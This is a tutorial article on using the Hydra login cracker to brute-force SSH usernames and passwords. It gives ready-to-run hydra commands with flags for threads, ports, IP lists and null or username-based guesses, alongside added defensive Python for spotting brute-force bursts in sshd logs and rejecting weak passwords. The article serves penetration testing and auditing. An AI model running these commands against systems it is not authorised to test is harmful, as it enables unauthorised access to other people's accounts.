How to use Hydra to Brute Force SSH passwords?

Brute Force SSH Using Hydra

In this article, we will be brute-forcing SSH Using Hydra. Hydra is one of the favorite tools in a hacker’s toolkit. It is an excellent tool for performing brute force attacks and can be used from a red team perspective to break into systems as well as from a blue team perspective to audit and test ssh passwords against common password lists like rockyou.txt and crackstation wordlists.

Note: This guide is purely for educational purposes. We do not claim liability for any property damages caused by the use of the knowledge gained from this guide.

Before we go ahead, let’s first understand what SSH is.

What is SSH (Secure Shell)?

SSH, or Secure Shell, is a widely used protocol that enables secure communication between two devices over an unsecured network. This protocol encrypts data that is exchanged between the devices, ensuring that the communication remains private and protected from eavesdropping or tampering.

SSH is commonly used for remote administration, file transfers, and managing network infrastructure. It is an essential tool for maintaining security in the digital world, as it helps protect sensitive information and system access from unauthorized users.

What is a Brute Force SSH attack?

However, like any security measure, SSH can be targeted by cyberattacks. One such attack is the brute-force attack, which involves systematically trying different combinations of usernames and passwords in an attempt to gain access to a system. This method can be time-consuming and resource-intensive, but it is sometimes successful, particularly when weak or easily guessable credentials are used.
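From the defender's side, this pattern is visible in the sshd authentication log. The following is an added example, not part of the original article: it flags source IPs that produce a burst of failed password logins and records a successful login from an already-flagged source. The log lines are constructed, and the threshold of 5 failures in 60 seconds is an assumed tuning value.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in OpenSSH sshd syslog format (documentation IP ranges).
SAMPLE_LOG = """\
Mar 10 09:14:01 srv sshd[2101]: Failed password for john.doe from 203.0.113.7 port 40112 ssh2
Mar 10 09:14:02 srv sshd[2102]: Failed password for john.doe from 203.0.113.7 port 40114 ssh2
Mar 10 09:14:02 srv sshd[2103]: Failed password for john.doe from 203.0.113.7 port 40116 ssh2
Mar 10 09:14:04 srv sshd[2104]: Failed password for invalid user admin from 198.51.100.23 port 51000 ssh2
Mar 10 09:14:05 srv sshd[2105]: Failed password for john.doe from 203.0.113.7 port 40118 ssh2
Mar 10 09:14:07 srv sshd[2106]: Failed password for john.doe from 203.0.113.7 port 40120 ssh2
Mar 10 09:14:09 srv sshd[2107]: Accepted password for alice from 192.0.2.10 port 60022 ssh2
Mar 10 09:14:11 srv sshd[2108]: Accepted password for john.doe from 203.0.113.7 port 40122 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window_s=60, year=2024):
    """Flag IPs with >= threshold failed logins inside window_s seconds.
    Syslog timestamps carry no year, so the caller supplies one."""
    recent = defaultdict(deque)  # ip -> failure times still inside the window
    users = defaultdict(set)     # ip -> usernames it has tried
    flagged = {}
    for m in filter(None, map(LINE_RE.match, log_text.splitlines())):
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            q = recent[ip]
            q.append(ts)
            users[ip].add(user)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= threshold:
                hit = flagged.setdefault(ip, {"peak": 0, "login_after_burst": None})
                hit["peak"] = max(hit["peak"], len(q))
        elif ip in flagged:
            # A success from an already-flagged source needs immediate triage.
            flagged[ip]["login_after_burst"] = user
    for ip, hit in flagged.items():
        hit["users"] = sorted(users[ip])
    return flagged

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

A long `users` list for one source points to username guessing, while a single user with a high `peak` points to password guessing against a known account.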

What is Hydra?

Hydra is an open-source parallelized login cracker that allows us to perform various kinds of brute-force or dictionary attacks using a password list. Some common protocols that Hydra supports include SSH (Secure Shell), FTP (File Transfer Protocol), and HTTP (Hypertext Transfer Protocol), among many others. It comes by default with all pentesting distros like Kali Linux, but it can also be installed with the apt command as follows:

$ sudo apt install hydra

This command should work on any Debian-based distribution such as Ubuntu or Kali Linux. In case the package is not found, or you run into an error, you can also refer to the GitHub repo and install it using the specified instructions.

How to Use Hydra?

To use Hydra, you need to specify the necessary flags and options according to your attack requirements in the command line. Here’s a simple example of attacking an SSH server with a known username and a wordlist of passwords:

$ hydra -l john.doe -P /path/to/wordlist.txt 192.168.1.100 ssh

This command would attempt to find the correct password for the user “john.doe” on the SSH server at IP address 192.168.1.100 using the provided wordlist.

Explanation of the basic syntax of hydra

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]

Let’s take a closer look at its syntax components and what they mean:

  1. -l LOGIN or -L FILE: Choose a single target username (LOGIN) or a file with a list of usernames (FILE).
  2. -p PASS or -P FILE: Select one password (PASS) or a file with multiple passwords (FILE).
  3. -C FILE: Use a file containing username/password pairs, separated by colons.
  4. -e nsr: Enable extra password checks (‘n’ for null, ‘s’ for the same as the username, and ‘r’ for reversed).
  5. -o FILE: Save the results to a file.
  6. -t TASKS: Set the number of tasks (threads) to run in parallel.
  7. -M FILE: Use a file containing IP addresses or hostnames to target.
  8. -T TASKS: Set the number of tasks (threads) per target when using multiple IPs/hostnames.
  9. -w TIME: Set the time to wait (in seconds) between retries.
  10. -W TIME: Set the time to wait (in seconds) between login attempts.
  11. -f: Stop the attack once a valid username/password combination is found.
  12. -s PORT: Choose the target port number.
  13. -x MIN:MAX:CHARSET: Configure a brute force attack, defining minimum (MIN) and maximum (MAX) password length and character set (CHARSET).
  14. -c TIME: Set the time to wait (in seconds) before closing idle connections.
  15. -I: Turn off SSL/TLS certificate checks.
  16. -S: Turn on SSL/TLS connections.
  17. -O: Use OpenSSH-style host and port specifications.
  18. -u: Resume a previous session.
  19. -v: Verbose mode. Use -V for even more detail.
  20. -d: Enable debug mode.
  21. -4: Force IPv4 usage.
  22. -6: Force IPv6 usage.
  23. -m MODULE_OPT: Set module-specific options.
  24. service://server[:PORT][/OPT]: Specify the service to attack (e.g., ssh, ftp, http), the server’s IP or hostname, and any optional service-specific options.

Brute-force Usernames and Passwords with Hydra

While trying to brute-force ssh credentials, there are 3 possible combinations:

  • Bruteforcing Passwords
  • Bruteforcing Usernames
  • Bruteforcing Passwords and Usernames

First things first, we would need wordlists for our brute-force attack. You can fetch some well-known wordlists with wordlistctl, and once you have your wordlist ready, we can move on!

1. Bruteforcing Passwords

To brute-force ssh passwords with a known username, the command should look something like this in the Terminal:

$ hydra -l <username> -P <path to wordlist> <IP> ssh

2. Bruteforcing Usernames

To brute-force ssh usernames with a known password, the syntax is:

$ hydra -L <path to wordlist> -p <password> <IP> ssh

3. Bruteforcing Both Usernames And Passwords

If you do not know both the username and the password, the syntax is as follows:

$ hydra -L <path to username wordlist> -P <path to password wordlist> <IP> ssh

Some Special Flags

Sometimes we have some special conditions, and we need to orchestrate our attack accordingly. In this section, we will discuss some special flags which help us to customize our attacks.

1. Change The Number Of Threads

By default, hydra runs 16 threads, but we can change this value with the -t flag:

$ hydra -l <username> -P <path to wordlist> <IP> -t <number of threads> ssh

Example of a Hydra attack against an SSH server with a custom number of threads:

$ hydra -l john.doe -P /path/to/wordlist.txt 192.168.1.100 -t 32 ssh

2. Change The Port Number

Sometimes, sysadmins change the ssh port number from the default 22 to some other port. Hence, to use a different port number, we use the -s flag:

$ hydra -s <port number> -l <username> -P <path to wordlist> <IP> ssh

3. Brute Forcing A List Of IPs

Just like we can brute-force a list of usernames and passwords, we can also brute-force SSH on a list of IPs using the -M flag:

$ hydra -l <username> -P <path to wordlist> -M <path to Ip list> ssh

4. Miscellaneous

We can also enable a more verbose output with the -V flag. Also, users and sysadmins sometimes leave certain obvious passwords in place that our wordlists may not cover; these can be included with the -e flag. A popular trio that goes with this flag are the letters ‘nsr’, where ‘n’ stands for null and tries to log in without any password at all, ‘s’ stands for same, i.e., it uses the username itself as a password, while ‘r’ tries the reversed username as a potential password. The syntax for this should look like this:

$ hydra -l <username> -P <path to wordlist> <IP> -V -e nsr ssh

5. -V (Verbose Mode) in Hydra

The verbose mode can be helpful for a better understanding of the progress and results of the attack. To enable verbose mode, simply use the -V flag:

$ hydra -l <username> -P <path to wordlist> <IP> -V ssh

Example of a Hydra attack against an SSH server with verbose mode enabled:

$ hydra -l john.doe -P /path/to/wordlist.txt 192.168.1.100 -V ssh

6. -e nsr flag in Hydra

To use Hydra with the -e nsr flag, which tests for null passwords, passwords that are the same as the username, and reversed-username passwords:

$ hydra -l <username> -P <path to wordlist> <IP> -e nsr ssh

Example of a Hydra attack against an SSH server using the -e nsr flag:

$ hydra -l john.doe -P /path/to/wordlist.txt 192.168.1.100 -e nsr ssh
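The three guesses behind -e nsr, described here and in the Miscellaneous section above, can be rejected before they are ever set. The following is an added example, not part of the original article or of Hydra: a password-change check that refuses null, same-as-username, reversed-username and common-list passwords. The function names, the tiny COMMON set and the sample accounts are constructed for illustration, and matching on the pieces of a dotted or e-mail style login goes slightly beyond what -e nsr itself tries.

```python
import re
import unicodedata

# Constructed stand-in for a common-password list such as rockyou.txt.
COMMON = {"123456", "password", "qwerty", "letmein"}

def _norm(s):
    """Fold case and Unicode forms so 'John.Doe' and 'john.doe' compare equal."""
    return unicodedata.normalize("NFKC", s).casefold().strip()

def _name_variants(username):
    """The login itself, its part before '@', and its dot/dash/underscore pieces."""
    user = _norm(username)
    local = user.split("@", 1)[0]
    return {v for v in {user, local, *re.split(r"[._-]", local)} if v}

def weak_password_reasons(username, password, common=COMMON):
    """Return which trivial guesses (the -e nsr trio, or a wordlist) would hit."""
    pw = _norm(password)
    if not pw:
        return ["null"]
    reasons = []
    variants = _name_variants(username)
    if pw in variants:
        reasons.append("same-as-username")
    if pw[::-1] in variants:
        reasons.append("reversed-username")
    if pw in common:
        reasons.append("common-password")
    return reasons

def audit(candidates, common=COMMON):
    """Map each username to its findings; accounts with none are omitted."""
    findings = {}
    for username, password in candidates:
        reasons = weak_password_reasons(username, password, common)
        if reasons:
            findings[username] = reasons
    return findings

if __name__ == "__main__":
    # Constructed (username, proposed password) pairs seen at password-change time.
    sample = [("john.doe", "eod.nhoj"), ("alice", "Alice"), ("bob", ""),
              ("carol", "letmein"), ("dave", "T7#vq!m2Lz")]
    print(audit(sample))
```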

7. -s flag in Hydra

To specify a custom port number for the SSH server using the -s flag:

$ hydra -s <port number> -l <username> -P <path to wordlist> <IP> ssh

Example of a Hydra attack against an SSH server with a custom port number (2222):

$ hydra -s 2222 -l john.doe -P /path/to/wordlist.txt 192.168.1.100 ssh

8. -h flag (To know more usage of Hydra)

The -h flag is used to display Hydra’s help menu, which provides an overview of the available options and their usage:

$ hydra -h

This command will output the help menu, giving you a comprehensive list of flags and options to customize your Hydra attacks, through which you can connect to a remote PC.

Conclusion

Hydra can be a pretty powerful tool when you want to brute-force ssh connections, and can be coupled with several other flags to customize your attack. However, this must not be exploited to poke around stuff you are not meant to, and the users alone are accountable for their actions.